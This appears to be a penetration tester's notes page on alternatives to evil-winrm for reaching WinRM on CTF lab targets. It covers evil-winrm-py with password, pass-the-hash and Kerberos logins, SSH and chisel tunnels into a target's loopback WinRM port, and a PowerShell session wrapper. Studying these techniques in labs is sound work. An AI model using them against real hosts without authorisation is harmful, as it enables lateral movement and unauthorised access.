Evil-WinRM Alternatives
Problem
evil-winrm works great in a pinch, but is often very buggy, so I've documented some workarounds that may be worth exploring.
Solutions
evil-winrm-py
Project GitHub: https://github.com/adityatelange/evil-winrm-py
Install prerequisite packages:
sudo apt install gcc python3-dev libkrb5-dev krb5-pkinit krb5-user

Install evil-winrm-py in a dedicated virtual environment using pipx (the extra is quoted so the shell does not expand the brackets):
pipx install 'evil-winrm-py[kerberos]'

Installation takes a while because the Kerberos libraries have to be compiled; be patient!

Password authentication:
evil-winrm-py -i 10.80.80.2 -u 'john.doe' -p 'P@$$word123!'

Pass-the-hash authentication:
evil-winrm-py -i 10.80.80.2 -u 'john.doe' -H 'd8e8fca2dc0f896fd7cb4cb0031ba249'

Kerberos authentication:
KRB5_CCNAME='john.doe.ccache' evil-winrm-py -k -i 'DC01.ad.lab'
Port Forwarding to Windows Host
I have tried extensively to get PSWSMan to work with Kali Linux. The module is functional and cmdlets appear to work, but when running New-PSSession, the session never initializes and just hangs on the server.
At this point, the objective is just to get a functioning, native WSMan client with as little effort as possible.
I've come to the conclusion that the best way to get a native WSMan client is to use port forwarding (e.g. SSH) and a Windows VM / host. The traffic from the native WSMan client on the Windows host is tunneled through the SSH port forward to the target.
What Would that Look Like?
Imagine you're working on a CTF box on some platform such as HackTheBox or TryHackMe ...
FORWARD SSH PORT FORWARDING

SSH from the Windows box into Kali and forward a local port to the target's WinRM port:
ssh -i id_rsa -f -N -L 127.0.0.1:45985:target.htb:5985 user@kali-ip

 ____________                          ____________                          ____________
|            |                         |            |                         |            |
|  WINDOWS   |                         |            |                         |    HTB     |
|    HOST    | [+] =====[ SSH ]==== >> |    KALI    | [+]===[ HTB VPN ]=== >> |   TARGET   |
|            |  ^                   |  |            |  |                   |  |            |
'------------'  |                   |  '------------'  |                   |  '------------'
127.0.0.1:45985-'                   '----WinRM---------'                   '-> target.htb:5985

$s = New-PSSession `
    -ComputerName 127.0.0.1 `
    -Port 45985 `
    -Credential (Get-Credential)
REVERSE SSH PORT FORWARDING

SSH from Kali into the Windows box and open a reverse tunnel back to the target's WinRM port:
ssh -i id_rsa -f -N -R 127.0.0.1:45985:target.htb:5985 user@windows-host-ip

 ____________                          ____________                          ____________
|            |                         |            |                         |            |
|  WINDOWS   |                         |            |                         |    HTB     |
|    HOST    | << =====[ SSH ]=====[+] |    KALI    | [+]===[ HTB VPN ]=== >> |   TARGET   |
|            |  ^                   |  |            |  |                   |  |            |
'------------'  |                   |  '------------'  |                   |  '------------'
127.0.0.1:45985-'                   '----WinRM---------'                   '-> target.htb:5985

$s = New-PSSession `
    -ComputerName 127.0.0.1 `
    -Port 45985 `
    -Credential (Get-Credential)
What if the WinRM port is bound to loopback on the target?
The left half of the solution stays nearly the same, but first you need to set up a port forward between Kali and the target.
1. CHISEL REVERSE PORT FORWARD

Proxy the WinRM port on the target's loopback back to Kali.

On Kali:
sudo ./chisel \
    server --port 48080 \
    --reverse &

On the target:
Start-Job -ScriptBlock {
    C:\Windows\Tasks\chisel.exe client kali-ip:48080 R:5985:127.0.0.1:5985
}

 ____________                          ____________                          ____________
|            |                         |            |                         |            |
|  WINDOWS   |                         |            |                         |    HTB     |
|    HOST    |                         |    KALI    | << ====[ CHISEL ]===[+] |   TARGET   |
|            |                         |            |  ^                   |  |            |
'------------'                         '------------'  |                   |  '------------'
                                        127.0.0.1:5985-'                   '-> target.htb:5985
2. SSH FORWARD PORT FORWARDING (OR REVERSE)

SSH from the Windows box into Kali and forward local tcp/45985 to tcp/5985 on Kali, which chisel forwards to tcp/5985 on the target's loopback:
ssh -i id_rsa -f -N -L 127.0.0.1:45985:127.0.0.1:5985 user@kali-ip

 ____________                          ____________                          ____________
|            |                         |            |                         |            |
|  WINDOWS   |                         |            |                         |    HTB     |
|    HOST    | [+]=====[ SSH ]===== >> |    KALI    | << ====[ CHISEL ]===[+] |   TARGET   |
|            |  ^                   |  |            |  |                   |  |            |
'------------'  |                   |  '------------'  |                   |  '------------'
127.0.0.1:45985-'                   |   127.0.0.1:5985-'                   '-> target.htb:5985
                                    |                  ^
                                    '--WinRM-----------'

$s = New-PSSession `
    -ComputerName 127.0.0.1 `
    -Port 45985 `
    -Credential (Get-Credential)
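The bare New-PSSession lines above only work once the local WinRM client trusts the loopback address, so here is a small wrapper, added as an example and not part of the original notes, that adds the TrustedHosts check, confirms the forward is alive, and then opens the session. It assumes the forward listens on 127.0.0.1:45985 and that the Windows host's own WinRM service is running (the WSMan: drive needs it); the function and parameter names are mine.

```powershell
# Added example (not from the original notes): open a PSSession through one of the
# local SSH/chisel forwards above. Assumes the forward listens on 127.0.0.1:45985
# and that the Windows host's own WinRM service is running (the WSMan: drive needs
# it). Editing TrustedHosts requires an elevated PowerShell prompt.
function Connect-ForwardedWinRM {
    [CmdletBinding()]
    param(
        [string]$LocalAddress = '127.0.0.1',
        [int]$LocalPort = 45985,
        [Parameter(Mandatory)][pscredential]$Credential
    )

    # 1. The forward is plain HTTP on a loopback IP. No Kerberos SPN matches
    #    "127.0.0.1", so Negotiate falls back to NTLM, and the WinRM client refuses
    #    NTLM over HTTP unless the destination is listed in TrustedHosts.
    $trusted = (Get-Item WSMan:\localhost\Client\TrustedHosts).Value
    if ($trusted -ne '*' -and (($trusted -split ',') -notcontains $LocalAddress)) {
        $newValue = if ([string]::IsNullOrWhiteSpace($trusted)) { $LocalAddress } else { "$trusted,$LocalAddress" }
        Set-Item WSMan:\localhost\Client\TrustedHosts -Value $newValue -Force
        Write-Verbose "Added $LocalAddress to WSMan TrustedHosts"
    }

    # 2. Fail fast if the tunnel is down; New-PSSession would otherwise sit on a
    #    listener that never answers, the same symptom described for PSWSMan above.
    $tcp = Test-NetConnection -ComputerName $LocalAddress -Port $LocalPort -WarningAction SilentlyContinue
    if (-not $tcp.TcpTestSucceeded) {
        throw "Nothing is listening on ${LocalAddress}:${LocalPort}; is the SSH/chisel forward up?"
    }

    # 3. Test-WSMan sends an authenticated Identify request, which proves the
    #    forwarded listener really is a WSMan endpoint and that the credential works.
    $id = Test-WSMan -ComputerName $LocalAddress -Port $LocalPort `
        -Authentication Negotiate -Credential $Credential
    Write-Verbose ("Remote WSMan stack: {0} {1}" -f $id.ProductVendor, $id.ProductVersion)

    # 4. Open the session with Negotiate stated explicitly so the NTLM fallback is
    #    deliberate rather than a surprise; keep timeouts short for a tunneled link.
    $opts = New-PSSessionOption -OpenTimeout 30000 -OperationTimeout 60000
    New-PSSession -ComputerName $LocalAddress -Port $LocalPort -Credential $Credential `
        -Authentication Negotiate -SessionOption $opts
}

# Usage:
#   $s = Connect-ForwardedWinRM -Credential (Get-Credential) -Verbose
#   Enter-PSSession $s
```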
PSWSMan
I'm only including this here because I finally found the time to do some more testing and debugging and come up with some answers on making this work on Linux. However, I do not recommend this as a solution currently, as I've found the performance to be quite abysmal when going Linux -> Windows.
See documentation here: https://notes.benheater.com/books/kali-optimizations/page/installing-native-winrm-client